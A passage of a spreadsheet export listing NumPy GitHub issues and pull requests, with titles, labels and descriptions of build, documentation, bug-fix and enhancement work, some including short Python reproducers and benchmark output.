    <t>sphinx [released version 2.0.0](https://pypi.org/project/Sphinx/#history) which broke our build. Until we can catch up, pin to an earlier version</t>
  </si>
  <si>
    <t>BUILD: pin sphinx to 1.8.5</t>
  </si>
  <si>
    <t>Attempting to remove some of the references to items that don't exist. #12632 _x000D_
- [x] NPY_ITER_USE_MASKNA_x000D_
- [x] NpyIter_GetMaskNAIndexArray_x000D_
- [x] NpyMask_Create_x000D_
- [x] NpyMask_IsExposed_x000D_
- [x] NpyIter_GetFirstMaskNAOp_x000D_
- [x] NpyIter_GetMaskNAIndexArray_x000D_
_x000D_
Edit: added checklist (mattip)</t>
  </si>
  <si>
    <t>DOC : Fix C-API documentation references to items that don't exist</t>
  </si>
  <si>
    <t>I work with a research team on developing a higher dimensional root finding algorithm. We happened to learn that in the one-dimensional case, using the rotated companion matrix produces smaller errors._x000D_
Here is some sample code and the results._x000D_
_x000D_
```python_x000D_
import numpy as np_x000D_
_x000D_
from numpy.polynomial.polynomial import polyroots, polycompanion, polyfromroots_x000D_
from numpy.polynomial import polyutils as pu_x000D_
from numpy import linalg as la_x000D_
_x000D_
_x000D_
def polyroots2(c):_x000D_
    # c is a trimmed copy_x000D_
    [c] = pu.as_series([c])_x000D_
    if len(c) &lt; 2:_x000D_
        return np.array([], dtype=c.dtype)_x000D_
    if len(c) == 2:_x000D_
        return np.array([-c[0]/c[1]])_x000D_
_x000D_
    m = polycompanion(c)_x000D_
    r = la.eigvals(m[::-1,::-1])_x000D_
    r.sort()_x000D_
    return r_x000D_
_x000D_
def sort_diff(a,b):_x000D_
    return np.array(sorted(a)) - np.array(sorted(b))_x000D_
_x000D_
k = 1_x000D_
deg = 30_x000D_
seed = 786_x000D_
unif = np.random.uniform_x000D_
def error(solver):_x000D_
    err = []_x000D_
    np.random.seed(seed)_x000D_
    for _ in range(1000):_x000D_
        roots = unif(-k,k,size=deg) + 1j*unif(-k,k,size=deg)_x000D_
        c = polyfromroots(roots)_x000D_
        r = solver(c)_x000D_
        err.extend(sort_diff(roots, r).tolist())_x000D_
    return err_x000D_
_x000D_
err1 = error(polyroots)_x000D_
err2 = error(polyroots2)_x000D_
_x000D_
print('\t\tAbsolute Error')_x000D_
print("Original mean: {:1.3e}".format(np.abs(err1).mean()))_x000D_
print("Rotated mean : {:1.3e}".format(np.abs(err2).mean()))_x000D_
print()_x000D_
print("Original max : {:1.3e}".format(np.abs(err1).max()))_x000D_
print("Rotated max  : {:1.3e}".format(np.abs(err2).max()))`_x000D_
```_x000D_
_x000D_
```_x000D_
		Absolute Error_x000D_
Original mean: 4.636e-09_x000D_
Rotated mean : 5.357e-10_x000D_
_x000D_
Original max : 4.550e-05_x000D_
Rotated max  : 5.126e-06_x000D_
```</t>
  </si>
  <si>
    <t>ENH: use rotated companion matrix to reduce error</t>
  </si>
  <si>
    <t>['01 - Enhancement', 'component: numpy.polynomial']</t>
  </si>
  <si>
    <t>If an error is thrown when processing input, `np.genfromtxt` doesn't cleanly close the file it has opened._x000D_
_x000D_
For example, in the below, a `UnicodeDecodeError` is thrown while attempting to interpret `£` as ASCII. That error is expected, but it results in a `ResourceWarning` about the file not being properly closed._x000D_
_x000D_
Replace ``ascii`` with ``utf-8``, and the `ResourceWarning` vanishes._x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
```python_x000D_
import numpy as np_x000D_
import warnings_x000D_
_x000D_
warnings.simplefilter("always")_x000D_
_x000D_
with open("test.csv", "w") as f:_x000D_
    f.write("£")_x000D_
_x000D_
try:_x000D_
    np.genfromtxt("test.csv", encoding="ascii")_x000D_
except UnicodeDecodeError:_x000D_
    pass_x000D_
```_x000D_
_x000D_
### Error message:_x000D_
_x000D_
```_x000D_
$ python myproblem.py _x000D_
myproblem.py:12: ResourceWarning: unclosed file &lt;_io.TextIOWrapper name='test.csv' mode='rt' encoding='ascii'&gt;_x000D_
  pass_x000D_
ResourceWarning: Enable tracemalloc to get the object allocation traceback_x000D_
```_x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
```_x000D_
1.16.2 3.7.2 (default, Dec 30 2018, 08:55:50) _x000D_
[Clang 10.0.0 (clang-1000.11.45.5)]_x000D_
```</t>
  </si>
  <si>
    <t>`numpy.genfromtxt` doesn't properly close input in the event of an error</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- Please be sure you are following the instructions in the dev guidelines_x000D_
http://www.numpy.org/devdocs/dev/gitwash/development_workflow.html_x000D_
--&gt;_x000D_
Prefix Installation steps before the testing steps as Installation is the very first step to dig in NumPy._x000D_
Various and detailed steps be appended once approved._x000D_
&lt;!-- We'd appreciate it if your commit message is properly formatted_x000D_
http://www.numpy.org/devdocs/dev/gitwash/development_workflow.html#writing-the-commit-message_x000D_
--&gt;_x000D_
</t>
  </si>
  <si>
    <t>Update README.md  (Append Installation - details/steps)</t>
  </si>
  <si>
    <t xml:space="preserve">This PR implements an option to indicate to `apply_along_axis` that the function modifies `arr` in-place._x000D_
_x000D_
closes #13192 _x000D_
_x000D_
I am not sure about how best to handle the argument or what to name it, but for now I added an optional kwarg called `inplace`._x000D_
_x000D_
I didn't want to add any new positional arguments as that would almost certainly break existing user code. The `inplace` kwarg will also potentially break user code if a user-supplied `func1d` also expected a kwarg named `inplace`, but that is probably much less likely._x000D_
_x000D_
Another option would be to "hide" the kwarg by naming it something like `_inplace` if we only wanted to only support it for internal use such as in `np.pad` (I did not find other locations in NumPy itself where in-place modification was being used)._x000D_
_x000D_
Some test cases that indicate the expected behavior were added. _x000D_
</t>
  </si>
  <si>
    <t>ENH: add support for in-place array modification to apply_along_axis</t>
  </si>
  <si>
    <t>This is a demonstration of an [OpenBLAS build with statically-linked GCC runtime dependencies](https://github.com/tylerjereddy/openblas-static-gcc/blob/master/macos/build_openblas.sh) I did locally for MacOS--it should run through Azure CI just fine without any need for runtime `libgfortran` or `libquadmath`_x000D_
_x000D_
Inspired by discussion with @carlkl for Windows stuff, but figured it may be useful for mac portability too</t>
  </si>
  <si>
    <t>BLD: macOS OpenBLAS contains GCC libs</t>
  </si>
  <si>
    <t xml:space="preserve">Most of this is just emulating the behavior of python's divmod. With a carefully crafted out parameter, we can eliminate a lot of repetition._x000D_
</t>
  </si>
  <si>
    <t>MAINT: Simplify logic in convert_datetime_to_datetimestruct</t>
  </si>
  <si>
    <t>['03 - Maintenance', 'component: numpy.datetime64']</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- Please be sure you are following the instructions in the dev guidelines_x000D_
http://www.numpy.org/devdocs/dev/gitwash/development_workflow.html_x000D_
--&gt;_x000D_
Adding python/cpython#6172 Allow mmap objects to access the madvise() system call , based on @seberg recommendation ,and adding it numpy separately based on issue #13172 _x000D_
I added the `mmapmodule.c`  module in the numpy/numpy/core/src/common/ directory_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
&lt;!-- We'd appreciate it if your commit message is properly formatted_x000D_
http://www.numpy.org/devdocs/dev/gitwash/development_workflow.html#writing-the-commit-message_x000D_
--&gt;_x000D_
</t>
  </si>
  <si>
    <t>ENH: Added mmapmodule.c to Allow mmap objects to access the madvise() system call</t>
  </si>
  <si>
    <t>['01 - Enhancement', '55 - Needs work', '57 - Close?', 'component: numpy.core']</t>
  </si>
  <si>
    <t xml:space="preserve">Fixes #9293, #6272 _x000D_
_x000D_
This adds the overlap checks as suggested in  #6272 to `np.choose`, `np.take`, `np.put`, and `np.putmask`._x000D_
_x000D_
It is arguable whether or not this "fixes" #6272, since there are potentially more places overlap checks are needed, in particular in inplace operations. But at the very least this PR completes the checks listed by @seberg in #6272._x000D_
_x000D_
(Incidentally, I don't like that we always make a copy for `mode='raise'` in `np.take/put`. It defeats the point of having an `out` argument, which is to get no-copy performance!)_x000D_
</t>
  </si>
  <si>
    <t>MAINT: add overlap checks to choose, take, put, putmask</t>
  </si>
  <si>
    <t>The `bench_io.Savez.time_vb_savez_squares()` benchmark has a typo that leads to benchmarking `pickle.dump()` rather than any numpy write functions._x000D_
_x000D_
The `benchmarks.common.get_squares()` function returns a dict of arrays:_x000D_
```python_x000D_
In [4]: sq = get_squares()_x000D_
_x000D_
In [5]: type(sq)_x000D_
Out[5]: dict_x000D_
_x000D_
In [6]: sq.keys()_x000D_
Out[6]: dict_keys(['int16', 'float16', 'int32', 'float32', 'int64', 'float64', 'complex64', 'longfloat', 'complex128', 'complex256'])_x000D_
```_x000D_
Passing this to `np.savez()` as a positional argument results in the conversion to an object array dumped via `pickle.dump()`:_x000D_
```python_x000D_
In [18]: np.savez('tmp', sq)_x000D_
_x000D_
In [19]: npz = np.load('tmp.npz')_x000D_
_x000D_
In [20]: npz['arr_0'].dtype_x000D_
Out[20]: dtype('O')_x000D_
```_x000D_
_x000D_
Instead, if we unpack the dict, we exercise the actual numpy formatting code:_x000D_
```python_x000D_
In [22]: np.savez('tmp', **sq)_x000D_
_x000D_
In [23]: npz = np.load('tmp.npz')_x000D_
_x000D_
In [24]: npz.keys()_x000D_
Out[24]: KeysView(&lt;numpy.lib.npyio.NpzFile object at 0x7f274c186860&gt;)_x000D_
_x000D_
In [25]: list(npz.keys())_x000D_
Out[25]:_x000D_
['int16',_x000D_
 'float16',_x000D_
 'int32',_x000D_
 'float32',_x000D_
 'int64',_x000D_
 'float64',_x000D_
 'complex64',_x000D_
 'longfloat',_x000D_
 'complex128',_x000D_
 'complex256']_x000D_
_x000D_
In [26]: npz['int16'].dtype_x000D_
Out[26]: dtype('int16')_x000D_
```_x000D_
_x000D_
Since we're now benchmarking the `numpy` code for array writing, the benchmark is also considerably faster. Old benchmark:_x000D_
```_x000D_
[  0.01%] ··· bench_io.Savez.time_vb_savez_squares                        1.62±0.02s_x000D_
```_x000D_
New:_x000D_
```_x000D_
[  0.01%] ··· bench_io.Savez.time_vb_savez_squares                          267±3ms_x000D_
```_x000D_
_x000D_
Additionally, it appears we've seen a significant speedup since `v1.10`:_x000D_
```_x000D_
asv compare -s --only-changed v1.10.0 HEAD_x000D_
       before           after         ratio_x000D_
     [183fdb29]       [289d8048]_x000D_
     &lt;v1.10.0&gt;        &lt;bench_savez&gt;_x000D_
-       938±200ms          263±3ms     0.28  bench_io.Savez.time_vb_savez_squares_x000D_
```</t>
  </si>
  <si>
    <t>BENCH, BUG: fix Savez suite, previously was actually calling pickle.dump()</t>
  </si>
  <si>
    <t>['00 - Bug', 'component: benchmarks']</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</si>
  <si>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 Closes bug #13110 _x000D_
The earlier code had an incorrect optimisation for variance and that has been changed. Seems to be a very pervasive bug for complex number arrays._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>BUG: Fix of `var` method for complex arrays</t>
  </si>
  <si>
    <t>According to https://github.com/numpy/numpy/issues/13165 there's a reference count error when invalid inputs are given to `ndarray.flat`. The fix is to remove a superfluous `Py_DECREF` call in the invalid input case._x000D_
_x000D_
My reasoning for the fix is that [here](https://github.com/numpy/numpy/blob/251c526672f897543176b966229ecde96bb89a9d/numpy/core/src/multiarray/iterators.c#L630) we get a new reference to the new dtype as `indtype`, but in case of blatantly invalid input (say, `None` or a string) we only enter [this block](https://github.com/numpy/numpy/blob/251c526672f897543176b966229ecde96bb89a9d/numpy/core/src/multiarray/iterators.c#L638-L641) and then next [we decrease the refcount of `indtype`](https://github.com/numpy/numpy/blob/251c526672f897543176b966229ecde96bb89a9d/numpy/core/src/multiarray/iterators.c#L669-L671). I believe the bug was caused by the double deallocation together with the final `Py_XDECREF` call at the end. The `else` branch I removed was only tripped in cases where the input was invalid (otherwise we either return from the corresponding `if` branch or jump to the `fail` label from there). In every valid case we return with either [calling `Py_DECREF(indtype)` exactly once](https://github.com/numpy/numpy/blob/251c526672f897543176b966229ecde96bb89a9d/numpy/core/src/multiarray/iterators.c#L647) or [passing on its reference](https://github.com/numpy/numpy/blob/251c526672f897543176b966229ecde96bb89a9d/numpy/core/src/multiarray/iterators.c#L652-L653), and in non-trivially-invalid cases [we used to skip the now-removed `else` branch](https://github.com/numpy/numpy/blob/251c526672f897543176b966229ecde96bb89a9d/numpy/core/src/multiarray/iterators.c#L663-L665)._x000D_
_x000D_
I intended to add a regression test [as suggested by @seberg](https://github.com/numpy/numpy/issues/13165#issuecomment-475157997), but the bug causes a reference count error to be printed after the interpreter finishes. I don't know how I could test this (the `IndexError` is raised fine so a test would conclude just fine)._x000D_
_x000D_
Closes https://github.com/numpy/numpy/issues/13165.</t>
  </si>
  <si>
    <t>BUG: fix reference count error on invalid input to ndarray.flat</t>
  </si>
  <si>
    <t>Documentation for distutil.rst.txt template file is merged with distutil.rst conversion-of-src-files ._x000D_
The 2 sections describing similar distutils features are unified in the DISTUTILS.rst.txt file and discarded from distutils.rst file.</t>
  </si>
  <si>
    <t>DOC: Merge together DISTUTILS.rst.txt#template-files" and distutils.r…</t>
  </si>
  <si>
    <t xml:space="preserve">DOC: Attempting to remove duplicate documentation. #13013_x000D_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</si>
  <si>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Removed some c-api duplication</t>
  </si>
  <si>
    <t>We can turn on `-WT --keep-going` to fail the documentation build if there are any warnings. This might add to the burden of merging a PR since sometimes new warnings are hard to track down, but it would be better to handle them at the "source"._x000D_
_x000D_
The next step is to turn on `-n` which currently generates warnings on hundreds of bad references. xref #13114</t>
  </si>
  <si>
    <t>DOC, BUILD: fail the devdoc build if there are warnings</t>
  </si>
  <si>
    <t>['04 - Documentation', 'component: Documentation', 'component: build']</t>
  </si>
  <si>
    <t xml:space="preserve">Extracted from #9705, plus a few greps to find other occurrences_x000D_
</t>
  </si>
  <si>
    <t>STY: Fix weird indents to be multiples of 4 spaces</t>
  </si>
  <si>
    <t xml:space="preserve">`datetime64` repr values were prone to overflow, especially via subtraction, and the enforcement of strictly symmetric time limits about the unix epoch is [in our docs](https://docs.scipy.org/doc/numpy/reference/arrays.datetime.html) and something I need for writing robust datetime unit tests for other issues / PRs._x000D_
_x000D_
Consider this on master branch:_x000D_
```python_x000D_
ref = np.datetime64(0, 's')_x000D_
print(ref + np.timedelta64(np.iinfo(np.int64).max))_x000D_
print(ref - np.timedelta64(np.iinfo(np.int64).max))_x000D_
```_x000D_
Both `datetime64` representations are large positive year values, but the subtraction should be handled and well before the year 1970:_x000D_
```_x000D_
292277026596-12-04T15:30:07_x000D_
292277026596-12-03T08:29:53_x000D_
```_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>BUG: improve datetime64 span symmetry</t>
  </si>
  <si>
    <t>Passing invalid inputs to `ndarray.flat` will raise an error, but after the interpreter finishes there's a reference count error (python attempts to deallocate the integer 7):_x000D_
```_x000D_
&gt;&gt;&gt; import numpy as np_x000D_
&gt;&gt;&gt; np.arange(3).flat[None]_x000D_
Traceback (most recent call last):_x000D_
  File "&lt;stdin&gt;", line 1, in &lt;module&gt;_x000D_
IndexError: unsupported iterator index_x000D_
&gt;&gt;&gt; _x000D_
*** Reference count error detected: _x000D_
an attempt was made to deallocate 7 (l) ***_x000D_
```_x000D_
The issue is there in master._x000D_
_x000D_
~This is probably related to (or a duplicate of) https://github.com/numpy/numpy/issues/7982. The reason why I'm not sure this is a duplicate is because the other issue tries assigning to invalid memory, whereas here we're only attempting a read, and that could fail before breaking anything.~ Update: Since this is a different part of the code (subscription rather than subscripted assignment) and the input type triggering the error is different, I don't think it's related to that issue after all.</t>
  </si>
  <si>
    <t>ndarray.flat causes reference count error with invalid inputs</t>
  </si>
  <si>
    <t>~A start at m~Merging [bashtage/randomgen](https://github.com/bashtage/randomgen) into numpy, as part of [NEP 19](https://www.numpy.org/neps/nep-0019-rng-policy.html)._x000D_
_x000D_
The original repo was cloned, moved to a subdirectory, and then merged into numpy, as documented in `_randomgen/README-git.md`._x000D_
Then I moved the code into `numpy/random` and the docs into `doc/source/random` and `doc/source/papers`._x000D_
_x000D_
~Still very much a work in progress.~</t>
  </si>
  <si>
    <t>ENH: randomgen</t>
  </si>
  <si>
    <t>Update numpydoc to latest version, which should fix some warnings in generating documentation. See numpy/numpydoc#201 for more information</t>
  </si>
  <si>
    <t>BUILD: update numpydoc to latest version</t>
  </si>
  <si>
    <t>This makes CBLAS testing a bit easier since it checks 5 cases:_x000D_
_x000D_
- user-defined libraries_x000D_
- cblas + user-defined libraries_x000D_
- blas + user-defined libraries_x000D_
- cblas_x000D_
- blas_x000D_
_x000D_
In given order.</t>
  </si>
  <si>
    <t>BLD: streamlined CBLAS linkage tries, default to try libraries *as-is*</t>
  </si>
  <si>
    <t>['01 - Enhancement', '03 - Maintenance', 'component: build']</t>
  </si>
  <si>
    <t xml:space="preserve">This used to work in NumPy 1.15:_x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
```bash_x000D_
$ conda create -n np115 python=3.6 numpy=1.15_x000D_
$ conda activate np115_x000D_
$ conda list numpy_x000D_
# packages in environment at /var/container/conda/envs/np115:_x000D_
#_x000D_
# Name                    Version                   Build  Channel_x000D_
numpy                     1.15.4          py36h8b7e671_1002    conda-forge_x000D_
```_x000D_
```python_x000D_
&gt;&gt;&gt; import numpy as np_x000D_
_x000D_
&gt;&gt;&gt; np.random.seed(0)_x000D_
&gt;&gt;&gt; print(np.random.randint(0, 200, size=10, dtype='&lt;i4'))_x000D_
[172  47 117 192  67 195 103   9  21  36]_x000D_
_x000D_
&gt;&gt;&gt; np.random.seed(0)_x000D_
&gt;&gt;&gt;print(np.random.randint(0, 200, size=10, dtype='&gt;i4'))_x000D_
[172  47 117 192  67 195 103   9  21  36]_x000D_
```_x000D_
vs._x000D_
```bash_x000D_
$ conda create np116 python=3 numpy=1.16_x000D_
$ conda activate np116_x000D_
$ conda list numpy_x000D_
# packages in environment at /var/container/conda/envs/np116:_x000D_
#_x000D_
# Name                    Version                   Build  Channel_x000D_
numpy                     1.16.2           py36h8b7e671_1    conda-forge_x000D_
```_x000D_
_x000D_
### Error message:_x000D_
_x000D_
```pytb_x000D_
Traceback (most recent call last):_x000D_
  File "mtrand.pyx", line 975, in mtrand.RandomState.randint_x000D_
KeyError: dtype('&gt;i4')_x000D_
_x000D_
During handling of the above exception, another exception occurred:_x000D_
_x000D_
Traceback (most recent call last):_x000D_
  File "&lt;stdin&gt;", line 1, in &lt;module&gt;_x000D_
  File "mtrand.pyx", line 977, in mtrand.RandomState.randint_x000D_
TypeError: Unsupported dtype "&gt;i4" for randint_x000D_
```_x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
Python 3.6.7; NumPy 1.15.4 vs 1.16.2_x000D_
</t>
  </si>
  <si>
    <t>np.random.randint no longer supports non-native byteorder</t>
  </si>
  <si>
    <t>This adds libflame to the available list of LAPACK implementations._x000D_
_x000D_
It requires #13132 before merging (which is why this is a draft for now!)</t>
  </si>
  <si>
    <t>BLD: Add libflame as a LAPACK back-end</t>
  </si>
  <si>
    <t xml:space="preserve">This unifies the names for retrieving libraries in sections._x000D_
Previously one could only get umfpack libraries using:_x000D_
_x000D_
    [umfpack]_x000D_
    umfpack_libs = ..._x000D_
_x000D_
while now it prefers to use_x000D_
_x000D_
    [umfpack]_x000D_
    libraries = ..._x000D_
_x000D_
(but defaults to use umfpack_libs)._x000D_
Some libraries is system_info uses libraries whereas others were using_x000D_
`*_libs` as keys. All future developments I think should retain the_x000D_
libraries keyword, and only if applicable for sub-packages it should_x000D_
be deferred to more `_libs` entries._x000D_
_x000D_
This commit also fixes CBLAS linkage if the user has supplied a_x000D_
sufficient library. I.e. it first checks whether the CBLAS interface_x000D_
is present *as is*, then tries to add cblas, etc._x000D_
It should at least now work for more diverse libraries._x000D_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</si>
  <si>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BLD: streamlined library names in site.cfg sections</t>
  </si>
  <si>
    <t xml:space="preserve">When a custom function is provided to `numpy.pad`, the docstring states that this function should return a rank 1 vector.  However, it actually seems that it is required that the rank 1 vector input be modified in-place and it is not necessary to return an array._x000D_
_x000D_
I also updated a test case to make sure it is consistent with the modified description proposed here._x000D_
_x000D_
Two slight modifications to the example from the docstring illustrate this behavior._x000D_
_x000D_
1.) Padding fails if a copy of `vector` is made internally:_x000D_
_x000D_
```Python_x000D_
def pad_with(vector, pad_width, iaxis, kwargs):_x000D_
    pad_value = kwargs.get('padder', 10)_x000D_
    vector = vector.copy()_x000D_
    vector[:pad_width[0]] = pad_value_x000D_
    vector[-pad_width[1]:] = pad_value_x000D_
    return vector_x000D_
a = np.arange(6)_x000D_
a = a.reshape((2, 3))_x000D_
np.pad(a, 2, pad_with)_x000D_
```_x000D_
&gt; Out:_x000D_
   array([[0, 0, 0, 0, 0, 0, 0],_x000D_
       [0, 0, 0, 0, 0, 0, 0],_x000D_
       [0, 0, 0, 1, 2, 0, 0],_x000D_
       [0, 0, 3, 4, 5, 0, 0],_x000D_
       [0, 0, 0, 0, 0, 0, 0],_x000D_
       [0, 0, 0, 0, 0, 0, 0]])_x000D_
_x000D_
_x000D_
2.) Padding works if modification is done in-place, even without any return value:_x000D_
```Python_x000D_
def pad_with(vector, pad_width, iaxis, kwargs):_x000D_
    pad_value = kwargs.get('padder', 10)_x000D_
    vector[:pad_width[0]] = pad_value_x000D_
    vector[-pad_width[1]:] = pad_value_x000D_
    return_x000D_
a = np.arange(6)_x000D_
a = a.reshape((2, 3))_x000D_
np.pad(a, 2, pad_with)_x000D_
```_x000D_
&gt; Out:_x000D_
array([[10, 10, 10, 10, 10, 10, 10],_x000D_
       [10, 10, 10, 10, 10, 10, 10],_x000D_
       [10, 10,  0,  1,  2, 10, 10],_x000D_
       [10, 10,  3,  4,  5, 10, 10],_x000D_
       [10, 10, 10, 10, 10, 10, 10],_x000D_
       [10, 10, 10, 10, 10, 10, 10]])_x000D_
</t>
  </si>
  <si>
    <t>DOC: correction to numpy.pad docstring</t>
  </si>
  <si>
    <t xml:space="preserve">As requested by @mattip in #13102._x000D_
_x000D_
Unlike Python, NumPy integers have fixed sizes. This can lead to_x000D_
confusion when an integer overflow occurs and users expect NumPy integer_x000D_
types to behave similarly to Python integers. This commit explains_x000D_
integer overflow, an example and potential workarounds._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>DOC:  Add description of overflow errors</t>
  </si>
  <si>
    <t>These power functions are all the same - the algorithm used does not care about the basis._x000D_
_x000D_
`polypow` and `chebpow` have some optimizations in their versions, so I have left those intact._x000D_
_x000D_
Note that this will conflict with #11816. This is a more conservative approach that does not attempt to change any implementation in a way that affects optimization. It would be fairly straightforward to rebase that PR on top of this one if we decide we want to remove the optimizations.</t>
  </si>
  <si>
    <t>MAINT: Unify polynomial power functions</t>
  </si>
  <si>
    <t>[`__array_interface__`](https://6063-908607-gh.circle-artifacts.com/0/home/circleci/repo/doc/build/html/reference/arrays.interface.html#python-side) can accept an optional `offset` value when `data` is `None` or a `buffer`. Due to a bug, the key was looked for on the object rather than it's interface `dict`. Since `PyDict_GetItemString` first checks if the object is a `PyDictObject`, the lookup would always fail._x000D_
_x000D_
Searching for open issues about `offset` did not yield anything that looked like this was reported._x000D_
_x000D_
Added a test and a comment in the release notes.</t>
  </si>
  <si>
    <t>BUG: __array_interface__ offset was always ignored</t>
  </si>
  <si>
    <t xml:space="preserve">Backport of #13086._x000D_
_x000D_
Closes gh-11927_x000D_
_x000D_
To verify the changes I ran `python setup.py sdist` on `master` and on the branch this PR was made from, unpacked each sdist and ran this script:_x000D_
```_x000D_
import os_x000D_
_x000D_
_x000D_
def get_filelist(root):_x000D_
    allfiles = []_x000D_
    for path, subdirs, files in os.walk(root):_x000D_
        for name in files:_x000D_
            allfiles.append(os.path.join(path, name)[len(root):])_x000D_
_x000D_
    return allfiles_x000D_
_x000D_
_x000D_
path1 = 'numpy_master/numpy-1.17.0.dev0+48b0f3c/'_x000D_
path2 = 'numpy_manifest/numpy-1.17.0.dev0+a6bc29d/'_x000D_
_x000D_
files_master = get_filelist(path1)_x000D_
files_new = get_filelist(path2)_x000D_
_x000D_
print("Files now in sdist that weren't included previously:")_x000D_
for name in files_new:_x000D_
    if not name in files_master:_x000D_
        print(name)_x000D_
_x000D_
print("\n\nFiles now left out:")_x000D_
for name in files_master:_x000D_
    if not name in files_new:_x000D_
        print(name)_x000D_
```_x000D_
_x000D_
The result:_x000D_
```_x000D_
Files now in sdist that weren't included previously:_x000D_
cythonize.dat_x000D_
numpy/linalg/lapack_lite/fortran.py_x000D_
numpy/linalg/lapack_lite/f2c_d_lapack.f.patch_x000D_
numpy/linalg/lapack_lite/clapack_scrub.py_x000D_
numpy/linalg/lapack_lite/LICENSE.txt_x000D_
numpy/linalg/lapack_lite/f2c_s_lapack.f.patch_x000D_
numpy/linalg/lapack_lite/f2c_config.c.patch_x000D_
numpy/linalg/lapack_lite/f2c_z_lapack.f.patch_x000D_
numpy/linalg/lapack_lite/README.rst_x000D_
numpy/linalg/lapack_lite/f2c_lapack.f.patch_x000D_
numpy/linalg/lapack_lite/make_lite.py_x000D_
numpy/linalg/lapack_lite/f2c_c_lapack.f.patch_x000D_
numpy/linalg/lapack_lite/wrapped_routines_x000D_
_x000D_
_x000D_
Files now left out:_x000D_
_x000D_
```_x000D_
_x000D_
I think those should all be included._x000D_
_x000D_
The `LICENSE.txt` file was the important one pointed out in the bug report. The missing `cythonize.dat` was also not good, that must have triggered recompilation of Cython files for source builds that we didn't intend have happen._x000D_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</si>
  <si>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BLD: fix include list for sdist building.</t>
  </si>
  <si>
    <t>['00 - Bug', '08 - Backport', 'component: distribution']</t>
  </si>
  <si>
    <t xml:space="preserve">Backport of #13092._x000D_
_x000D_
As it was, the difference between stop and start was calculated and_x000D_
it was assumed that that would be a numpy scalar or array. This is_x000D_
not true for object input._x000D_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</si>
  <si>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Ensure linspace works on object input.</t>
  </si>
  <si>
    <t xml:space="preserve">Backport of #13093._x000D_
_x000D_
Fix #13087 by raising a ValueError with the same error message and adding a unit test for it._x000D_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</si>
  <si>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parameter validity checks in ``random.choice``</t>
  </si>
  <si>
    <t>['00 - Bug', '03 - Maintenance', '08 - Backport', 'component: numpy.random']</t>
  </si>
  <si>
    <t>&lt;https://build.opensuse.org/package/live_build_log/openSUSE:Factory:PowerPC/python-numpy/standard/ppc&gt;:_x000D_
_x000D_
=================================== FAILURES ===================================_x000D_
_________________ TestConversion.test_int_from_huge_longdouble __________________x000D_
_x000D_
self = &lt;numpy.core.tests.test_scalarmath.TestConversion object at 0xef02fef0&gt;_x000D_
_x000D_
    @pytest.mark.skipif(np.finfo(np.double) == np.finfo(np.longdouble),_x000D_
                        reason="long double is same as double")_x000D_
    @pytest.mark.skipif(platform.machine().startswith("ppc64"),_x000D_
                        reason="IBM double double")_x000D_
    def test_int_from_huge_longdouble(self):_x000D_
        # Produce a longdouble that would overflow a double,_x000D_
        # use exponent that avoids bug in Darwin pow function._x000D_
        exp = np.finfo(np.double).maxexp - 1_x000D_
&gt;       huge_ld = 2 * 1234 * np.longdouble(2) ** exp_x000D_
E       RuntimeWarning: overflow encountered in longdouble_scalars_x000D_
_x000D_
exp        = 1023_x000D_
self       = &lt;numpy.core.tests.test_scalarmath.TestConversion object at 0xef02fef0&gt;_x000D_
_x000D_
../../../BUILDROOT/python-numpy-1.16.1-3.1.ppc/usr/lib/python2.7/site-packages/numpy/core/tests/test_scalarmath.py:431: RuntimeWarning_x000D_
______________________________ TestKind.test_all ________________________________x000D_
_x000D_
self = &lt;numpy.f2py.tests.test_kind.TestKind object at 0xeede8d50&gt;_x000D_
_x000D_
    @pytest.mark.slow_x000D_
    def test_all(self):_x000D_
        selectedrealkind = self.module.selectedrealkind_x000D_
        selectedintkind = self.module.selectedintkind_x000D_
    _x000D_
        for i in range(40):_x000D_
            assert_(selectedintkind(i) in [selected_int_kind(i), -1],_x000D_
                    'selectedintkind(%s): expected %r but got %r' %_x000D_
                    (i, selected_int_kind(i), selectedintkind(i)))_x000D_
    _x000D_
        for i in range(20):_x000D_
            assert_(selectedrealkind(i) in [selected_real_kind(i), -1],_x000D_
                    'selectedrealkind(%s): expected %r but got %r' %_x000D_
&gt;                   (i, selected_real_kind(i), selectedrealkind(i)))_x000D_
E           AssertionError: selectedrealkind(16): expected 10 but got 16_x000D_
_x000D_
i          = 16_x000D_
selectedintkind = &lt;fortran object&gt;_x000D_
selectedrealkind = &lt;fortran object&gt;_x000D_
self       = &lt;numpy.f2py.tests.test_kind.TestKind object at 0xeede8d50&gt;_x000D_
_x000D_
../../../BUILDROOT/python-numpy-1.16.1-3.1.ppc/usr/lib/python2.7/site-packages/numpy/f2py/tests/test_kind.py:34: AssertionError_x000D_
= 2 failed, 7227 passed, 132 skipped, 11 xfailed, 2 xpassed in 490.92 seconds ==</t>
  </si>
  <si>
    <t>BUG: Fix testsuite failures on ppc and riscv</t>
  </si>
  <si>
    <t>['00 - Bug', '05 - Testing', 'component: numpy.core', 'component: numpy.f2py']</t>
  </si>
  <si>
    <t>Fixes some of the easy warnings and errors from the LGTM tests</t>
  </si>
  <si>
    <t>DEV: cleanup imports and some assignments (from LGTM)</t>
  </si>
  <si>
    <t>['component: numpy.core']</t>
  </si>
  <si>
    <t>&lt;!--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import numpy as np_x000D_
&lt;&lt; your code here &gt;&gt;_x000D_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I tried to run" import numpy as np" but it shows me an error message. I uninstalled and reinstalled 2 times but the problem is still present. I installed anaconda via the site : "https://www.anaconda.com/distribution/" and I launched the launcher for the installed one.The message is :_x000D_
_x000D_
ImportError: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C:\Users\harry\Anaconda3\pythonw.exe),_x000D_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No module named 'numpy.core._multiarray_umath'</t>
  </si>
  <si>
    <t>Problem with import numpy</t>
  </si>
  <si>
    <t xml:space="preserve">fenv.h is not available on uclibc, arc architecture on glibc does not support FPU exceptions_x000D_
</t>
  </si>
  <si>
    <t>BUG: Fix build for glibc on ARC and uclibc.</t>
  </si>
  <si>
    <t>This commit adds the following methods in numpy.linalg:_x000D_
 * get_num_threads() returns the number of threads used by BLAS._x000D_
 * set_num_threads(n) sets the number of threads which will be used_x000D_
   by further calls to BLAS._x000D_
